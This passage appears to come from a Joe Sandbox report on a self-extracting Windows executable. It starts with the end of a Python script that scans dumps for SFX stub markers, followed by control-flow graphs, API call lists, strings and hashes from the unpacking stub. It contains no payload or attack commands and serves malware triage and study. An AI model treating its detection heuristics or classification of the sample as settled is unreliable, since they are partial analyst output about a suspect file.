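    # Usage: python sfx_triage.py <dump-or-pe>; with no path, the constructed positive is scanned.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            blob = fh.read()
    else:
        blob = SAMPLE_SFX
    for marker, hit in sfx_marker_hits(blob).items():
        print(f"{'HIT ' if hit else '    '} {marker}")
    print(classify(blob))
```

Run it against the .sdmp files listed under Memory Dump Source (or the original file.exe) rather than against the dropped payloads: the markers belong to the SFX stub in the 00E30000 image, and their absence from a later-stage dump is expected.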

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 269 e40863-e40886 call e4ec50 GetModuleHandleW 272 e408e7-e40b48 269->272 273 e40888-e4089f GetProcAddress 269->273 276 e40c14-e40c40 GetModuleFileNameW call e3c29a call e40602 272->276 277 e40b4e-e40b59 call e575fb 272->277 274 e408a1-e408b7 273->274 275 e408b9-e408c9 GetProcAddress 273->275 274->275 278 e408e5 275->278 279 e408cb-e408e0 275->279 291 e40c42-e40c4e call e3b146 276->291 277->276 285 e40b5f-e40b8d GetModuleFileNameW CreateFileW 277->285 278->272 279->278 289 e40b8f-e40b9b SetFilePointer 285->289 290 e40c08-e40c0f CloseHandle 285->290 289->290 292 e40b9d-e40bb9 ReadFile 289->292 290->276 298 e40c50-e40c5b call e4081b 291->298 299 e40c7d-e40ca4 call e3c310 GetFileAttributesW 291->299 292->290 295 e40bbb-e40be0 292->295 297 e40bfd-e40c06 call e40371 295->297 297->290 306 e40be2-e40bfc call e4081b 297->306 298->299 308 e40c5d-e40c7b CompareStringW 298->308 309 e40ca6-e40caa 299->309 310 e40cae 299->310 306->297 308->299 308->309 309->291 312 e40cac 309->312 313 e40cb0-e40cb5 310->313 312->313 314 e40cb7 313->314 315 e40cec-e40cee 313->315 316 e40cb9-e40ce0 call e3c310 GetFileAttributesW 314->316 317 e40cf4-e40d0b call e3c2e4 call e3b146 315->317 318 e40dfb-e40e05 315->318 323 e40ce2-e40ce6 316->323 324 e40cea 316->324 328 e40d73-e40da6 call e34092 AllocConsole 317->328 329 e40d0d-e40d6e call e4081b * 2 call e3e617 call e34092 call e3e617 call e4a7e4 317->329 323->316 326 e40ce8 323->326 324->315 326->315 334 e40df3-e40df5 ExitProcess 328->334 335 e40da8-e40ded GetCurrentProcessId AttachConsole call e53e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->335 329->334 335->334
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 00E4087C
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E4088E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E408BF
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E40B69
                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E40B83
                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E40B93
                                                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,|<,00000000), ref: 00E40BB1
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E40C09
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E40C1E
                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<,?,00000000,?,00000800), ref: 00E40C72
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,|<,00000800,?,00000000,?,00000800), ref: 00E40C9C
                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,D=,00000800), ref: 00E40CD8
                                                                                                                      • Part of subcall function 00E4081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E40836
                                                                                                                      • Part of subcall function 00E4081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E3F2D8,Crypt32.dll,00000000,00E3F35C,?,?,00E3F33E,?,?,?), ref: 00E40858
                                                                                                                    • _swprintf.LIBCMT ref: 00E40D4A
                                                                                                                    • _swprintf.LIBCMT ref: 00E40D96
                                                                                                                      • Part of subcall function 00E34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E340A5
                                                                                                                    • AllocConsole.KERNEL32 ref: 00E40D9E
                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00E40DA8
                                                                                                                    • AttachConsole.KERNEL32(00000000), ref: 00E40DAF
                                                                                                                    • _wcslen.LIBCMT ref: 00E40DC4
                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00E40DD5
                                                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00E40DDC
                                                                                                                    • Sleep.KERNEL32(00002710), ref: 00E40DE7
                                                                                                                    • FreeConsole.KERNEL32 ref: 00E40DED
                                                                                                                    • ExitProcess.KERNEL32 ref: 00E40DF5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                    • String ID: (=$,<$,@$0?$0A$4B$8>$D=$DXGIDebug.dll$H?$H@$HA$P>$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=$`@$d?$dA$dwmapi.dll$h=$h>$kernel32$uxtheme.dll$|<$|?$|@$<$>$?$@$A
                                                                                                                    • API String ID: 1207345701-31210346
                                                                                                                    • Opcode ID: c572cde83669d1618811d48dc93805b9882a77722b422afd6f6122f61ceaa2ca
                                                                                                                    • Instruction ID: 4e5efc18142cc1301a4e8d8e399ad0e2fd0175958e0c4f1b8fd611fcc6978593
                                                                                                                    • Opcode Fuzzy Hash: c572cde83669d1618811d48dc93805b9882a77722b422afd6f6122f61ceaa2ca
                                                                                                                    • Instruction Fuzzy Hash: FED186B1548344AFD3319F60B84AB9FBAE8ABC5784F10691DF285B6191C7B0864CCB62

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 348 e4c73f-e4c757 call e4eb78 call e4ec50 353 e4d40d-e4d418 348->353 354 e4c75d-e4c787 call e4b314 348->354 354->353 357 e4c78d-e4c792 354->357 358 e4c793-e4c7a1 357->358 359 e4c7a2-e4c7b7 call e4af98 358->359 362 e4c7b9 359->362 363 e4c7bb-e4c7d0 call e41fbb 362->363 366 e4c7d2-e4c7d6 363->366 367 e4c7dd-e4c7e0 363->367 366->363 368 e4c7d8 366->368 369 e4c7e6 367->369 370 e4d3d9-e4d404 call e4b314 367->370 368->370 371 e4ca7c-e4ca7e 369->371 372 e4c7ed-e4c7f0 369->372 373 e4c9be-e4c9c0 369->373 374 e4ca5f-e4ca61 369->374 370->358 385 e4d40a-e4d40c 370->385 371->370 377 e4ca84-e4ca8b 371->377 372->370 379 e4c7f6-e4c850 call e4a64d call e3bdf3 call e3a544 call e3a67e call e36edb 372->379 373->370 378 e4c9c6-e4c9d2 373->378 374->370 376 e4ca67-e4ca77 SetWindowTextW 374->376 376->370 377->370 381 e4ca91-e4caaa 377->381 382 e4c9d4-e4c9e5 call e57686 378->382 383 e4c9e6-e4c9eb 378->383 434 e4c98f-e4c9a4 call e3a5d1 379->434 386 e4cab2-e4cac0 call e53e13 381->386 387 e4caac 381->387 382->383 390 e4c9f5-e4ca00 call e4b48e 383->390 391 e4c9ed-e4c9f3 383->391 385->353 386->370 404 e4cac6-e4cacf 386->404 387->386 395 e4ca05-e4ca07 390->395 391->395 400 e4ca12-e4ca32 call e53e13 call e53e3e 395->400 401 e4ca09-e4ca10 call e53e13 395->401 422 e4ca34-e4ca3b 400->422 423 e4ca4b-e4ca4d 400->423 401->400 408 e4cad1-e4cad5 404->408 409 e4caf8-e4cafb 404->409 412 e4cb01-e4cb04 408->412 414 e4cad7-e4cadf 408->414 411 e4cbe0-e4cbee call e40602 409->411 409->412 432 e4cbf0-e4cc04 call e5279b 411->432 416 e4cb06-e4cb0b 412->416 417 e4cb11-e4cb2c 412->417 414->370 420 e4cae5-e4caf3 call e40602 414->420 416->411 416->417 435 e4cb76-e4cb7d 417->435 436 e4cb2e-e4cb68 417->436 420->432 429 e4ca42-e4ca4a call e57686 422->429 430 e4ca3d-e4ca3f 422->430 423->370 431 e4ca53-e4ca5a call e53e2e 423->431 429->423 430->429 431->370 447 e4cc06-e4cc0a 432->447 448 e4cc11-e4cc62 call e40602 call e4b1be GetDlgItem SetWindowTextW SendMessageW call e53e49 432->448 452 e4c855-e4c869 SetFileAttributesW 434->452 453 e4c9aa-e4c9b9 call e3a55a 434->453 441 e4cb7f-e4cb97 call e53e13 435->441 442 e4cbab-e4cbce call e53e13 * 2 435->442 471 e4cb6c-e4cb6e 436->471 472 e4cb6a 436->472 441->442 458 e4cb99-e4cba6 call e405da 441->458 442->432 476 e4cbd0-e4cbde call e405da 442->476 447->448 454 e4cc0c-e4cc0e 447->454 482 e4cc67-e4cc6b 448->482 459 e4c90f-e4c91f GetFileAttributesW 452->459 460 e4c86f-e4c8a2 call e3b991 call e3b690 call e53e13 452->460 453->370 454->448 458->442 459->434 469 e4c921-e4c930 DeleteFileW 459->469 491 e4c8a4-e4c8b3 call e53e13 460->491 492 e4c8b5-e4c8c3 call e3bdb4 460->492 469->434 475 e4c932-e4c935 469->475 471->435 472->471 479 e4c939-e4c965 call e34092 GetFileAttributesW 475->479 476->432 489 e4c937-e4c938 479->489 490 e4c967-e4c97d MoveFileW 479->490 482->370 486 e4cc71-e4cc85 SendMessageW 482->486 486->370 489->479 490->434 493 e4c97f-e4c989 MoveFileExW 490->493 491->492 498 e4c8c9-e4c908 call e53e13 call e4fff0 491->498 492->453 492->498 493->434 498->459
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E4C744
                                                                                                                      • Part of subcall function 00E4B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00E4B3FB
                                                                                                                      • Part of subcall function 00E4AF98: _wcschr.LIBVCRUNTIME ref: 00E4B033
                                                                                                                    • _wcslen.LIBCMT ref: 00E4CA0A
                                                                                                                    • _wcslen.LIBCMT ref: 00E4CA13
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00E4CA71
                                                                                                                    • _wcslen.LIBCMT ref: 00E4CAB3
                                                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 00E4CBFB
                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 00E4CC36
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00E4CC46
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,00E7A472), ref: 00E4CC54
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E4CC7F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                                                    • String ID: %s.%d.tmp$<br>$<$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$
                                                                                                                    • API String ID: 986293930-3467919732
                                                                                                                    • Opcode ID: 13bb96e2199fad27fd3d3924e93d472a126b1c58f8c25a792f43f41a41af4b59
                                                                                                                    • Instruction ID: 24237bfd366e24eae285c7abfb166d6d11f9af1be3e90e558bba5e111b18b438
                                                                                                                    • Opcode Fuzzy Hash: 13bb96e2199fad27fd3d3924e93d472a126b1c58f8c25a792f43f41a41af4b59
                                                                                                                    • Instruction Fuzzy Hash: 6AE16472900218AADB24DBA1EC85EEE73BCEB05354F1454A6F649F3051EF749F888F61
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E3DA70
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E3DA91
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E3DAAC
                                                                                                                      • Part of subcall function 00E3C29A: _wcslen.LIBCMT ref: 00E3C2A2
                                                                                                                      • Part of subcall function 00E405DA: _wcslen.LIBCMT ref: 00E405E0
                                                                                                                      • Part of subcall function 00E41B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00E3BAE9,00000000,?,?,?,0001047E), ref: 00E41BA0
                                                                                                                    • _wcslen.LIBCMT ref: 00E3DDE9
                                                                                                                    • __fprintf_l.LIBCMT ref: 00E3DF1C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9
                                                                                                                    • API String ID: 557298264-1836506137
                                                                                                                    • Opcode ID: e237b701f10cdbdbfad7b3cd3ee6480f3e57d7629a6206ae253d3d94318772b9
                                                                                                                    • Instruction ID: 1bc6f05bb485952ab53e3d95585cfaf749b3ec1241aa2ff78354356a6d197379
                                                                                                                    • Opcode Fuzzy Hash: e237b701f10cdbdbfad7b3cd3ee6480f3e57d7629a6206ae253d3d94318772b9
                                                                                                                    • Instruction Fuzzy Hash: 3C32B071900218EBCF29EF68DC4AAEA7BA5FF44304F40255AF905B7291EBB19D85CB50

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E4B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E4B579
                                                                                                                      • Part of subcall function 00E4B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E4B58A
                                                                                                                      • Part of subcall function 00E4B568: IsDialogMessageW.USER32(0001047E,?), ref: 00E4B59E
                                                                                                                      • Part of subcall function 00E4B568: TranslateMessage.USER32(?), ref: 00E4B5AC
                                                                                                                      • Part of subcall function 00E4B568: DispatchMessageW.USER32(?), ref: 00E4B5B6
                                                                                                                    • GetDlgItem.USER32(00000068,00E8FCB8), ref: 00E4D4E8
                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00E4AF07,00000001,?,?,00E4B7B9,00E6506C,00E8FCB8,00E8FCB8,00001000,00000000,00000000), ref: 00E4D510
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E4D51B
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00E635F4), ref: 00E4D529
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E4D53F
                                                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00E4D559
                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E4D59D
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00E4D5AB
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E4D5BA
                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E4D5E1
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00E643F4), ref: 00E4D5F0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 3569833718-2967466578
                                                                                                                    • Opcode ID: ec15c6ed61b05b4ed3535e0b95ec3a4164f0a3523ac391a6765a7a52013511d9
                                                                                                                    • Instruction ID: d30b18a46451d779bf30e132a829c9242775a09298b9b9d076285d6b28798da3
                                                                                                                    • Opcode Fuzzy Hash: ec15c6ed61b05b4ed3535e0b95ec3a4164f0a3523ac391a6765a7a52013511d9
                                                                                                                    • Instruction Fuzzy Hash: 5D31E275145342BFE301DF31EC4AFAB7FACEB92708F00050AF551B61A1EB658A488B76

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 838 e4d78f-e4d7a7 call e4ec50 841 e4d7ad-e4d7b9 call e53e13 838->841 842 e4d9e8-e4d9f0 838->842 841->842 845 e4d7bf-e4d7e7 call e4fff0 841->845 848 e4d7f1-e4d7ff 845->848 849 e4d7e9 845->849 850 e4d801-e4d804 848->850 851 e4d812-e4d818 848->851 849->848 853 e4d808-e4d80e 850->853 852 e4d85b-e4d85e 851->852 852->853 854 e4d860-e4d866 852->854 855 e4d837-e4d844 853->855 856 e4d810 853->856 860 e4d86d-e4d86f 854->860 861 e4d868-e4d86b 854->861 858 e4d9c0-e4d9c2 855->858 859 e4d84a-e4d84e 855->859 857 e4d822-e4d82c 856->857 862 e4d82e 857->862 863 e4d81a-e4d820 857->863 865 e4d9c6 858->865 864 e4d854-e4d859 859->864 859->865 866 e4d882-e4d898 call e3b92d 860->866 867 e4d871-e4d878 860->867 861->860 861->866 862->855 863->857 868 e4d830-e4d833 863->868 864->852 872 e4d9cf 865->872 873 e4d8b1-e4d8bc call e3a231 866->873 874 e4d89a-e4d8a7 call e41fbb 866->874 867->866 869 e4d87a 867->869 868->855 869->866 875 e4d9d6-e4d9d8 872->875 884 e4d8be-e4d8d5 call e3b6c4 873->884 885 e4d8d9-e4d8dd 873->885 874->873 883 e4d8a9 874->883 878 e4d9e7 875->878 879 e4d9da-e4d9dc 875->879 878->842 879->878 882 e4d9de-e4d9e1 ShowWindow 879->882 882->878 883->873 884->885 888 e4d8e4-e4d8e6 885->888 888->878 889 e4d8ec-e4d8f9 888->889 890 e4d90c-e4d90e 889->890 891 e4d8fb-e4d902 889->891 893 e4d925-e4d944 call e4dc3b 890->893 894 e4d910-e4d919 890->894 891->890 892 e4d904-e4d90a 891->892 892->890 895 e4d97b-e4d987 CloseHandle 892->895 893->895 908 e4d946-e4d94e 893->908 894->893 902 e4d91b-e4d923 ShowWindow 894->902 896 e4d998-e4d9a6 895->896 897 e4d989-e4d996 call e41fbb 895->897 896->875 901 e4d9a8-e4d9aa 896->901 897->872 897->896 901->875 905 e4d9ac-e4d9b2 901->905 902->893 905->875 907 e4d9b4-e4d9be 905->907 907->875 908->895 909 e4d950-e4d961 GetExitCodeProcess 908->909 909->895 910 e4d963-e4d96d 909->910 911 e4d974 910->911 912 e4d96f 910->912 911->895 912->911
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00E4D7AE
                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00E4D8DE
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00E4D91D
                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00E4D959
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00E4D97F
                                                                                                                    • ShowWindow.USER32(?,00000001), ref: 00E4D9E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                    • String ID: .exe$.inf$PDu<$h$r
                                                                                                                    • API String ID: 36480843-2155249188
                                                                                                                    • Opcode ID: ae8195c4639facdf3f10110d3e179eed705cc1fa9929743194aead286ea633be
                                                                                                                    • Instruction ID: 4445a4c5fad3d48353e5f3e91502934821b14e6d7077f07bfe214e20dae2c7af
                                                                                                                    • Opcode Fuzzy Hash: ae8195c4639facdf3f10110d3e179eed705cc1fa9929743194aead286ea633be
                                                                                                                    • Instruction Fuzzy Hash: A351C37050C3809EDB219B25BC457BBBBE5AF85748F04241EF6C5F7191E7B18988CB52

                                                                                                                     Control-flow Graph (rendered image; legend: Executed / Not Executed). Function at 00E5A95B: API blocks MultiByteToWideChar (00E5A99C, 00E5AA30) and WideCharToMultiByte (00E5AB2F); internal calls to 00E5EF4C, 00E4FBBC, 00E58E06, 00E62010, 00E5AF6C and 00E5ABC3.
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E55695,00E55695,?,?,?,00E5ABAC,00000001,00000001,2DE85006), ref: 00E5A9B5
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E5ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00E5AA3B
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E5AB35
                                                                                                                    • __freea.LIBCMT ref: 00E5AB42
                                                                                                                      • Part of subcall function 00E58E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E5CA2C,00000000,?,00E56CBE,?,00000008,?,00E591E0,?,?,?), ref: 00E58E38
                                                                                                                    • __freea.LIBCMT ref: 00E5AB4B
                                                                                                                    • __freea.LIBCMT ref: 00E5AB70
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1414292761-0
                                                                                                                    • Opcode ID: e414783508b58af368b744f3ad0aecbce0d2defed8edb828fbe3110d5f786a3a
                                                                                                                    • Instruction ID: 0f3f02850dfbbfacb1df14ad77057d0ca80c0a4e4e5dbb5f733031fe01ebe087
                                                                                                                    • Opcode Fuzzy Hash: e414783508b58af368b744f3ad0aecbce0d2defed8edb828fbe3110d5f786a3a
                                                                                                                    • Instruction Fuzzy Hash: 0151C072A00216AFDB258E64DC41EABB7ABEB44755B195B3CFC04F7141EB34DC48C6A2

                                                                                                                     Control-flow Graph (rendered image; legend: Executed / Not Executed). Function at 00E53B72: LoadLibraryExW (00E53B95), then on the error path GetLastError (00E53BB3), a call to 00E56088 and a second LoadLibraryExW (00E53BD5); FreeLibrary (00E53C02).
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00E53C35,?,?,00E92088,00000000,?,00E53D60,00000004,InitializeCriticalSectionEx,00E66394,InitializeCriticalSectionEx,00000000), ref: 00E53C03
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID: api-ms-
                                                                                                                    • API String ID: 3664257935-2084034818
                                                                                                                    • Opcode ID: bc17ada843985430bd72f5d849fc5018c655fe693b6fefa85382f8a5388e90fa
                                                                                                                    • Instruction ID: 590c7cb7f0a044b5509bdb7d34285385288985ef551bf961735becbf5fe7902f
                                                                                                                    • Opcode Fuzzy Hash: bc17ada843985430bd72f5d849fc5018c655fe693b6fefa85382f8a5388e90fa
                                                                                                                    • Instruction Fuzzy Hash: B9110636A45220ABCF628B79AC41B5E77A49F017F6F211611ED11FB290E7B1EF0C86D0

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E4081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E40836
                                                                                                                      • Part of subcall function 00E4081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E3F2D8,Crypt32.dll,00000000,00E3F35C,?,?,00E3F33E,?,?,?), ref: 00E40858
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00E4AC2F
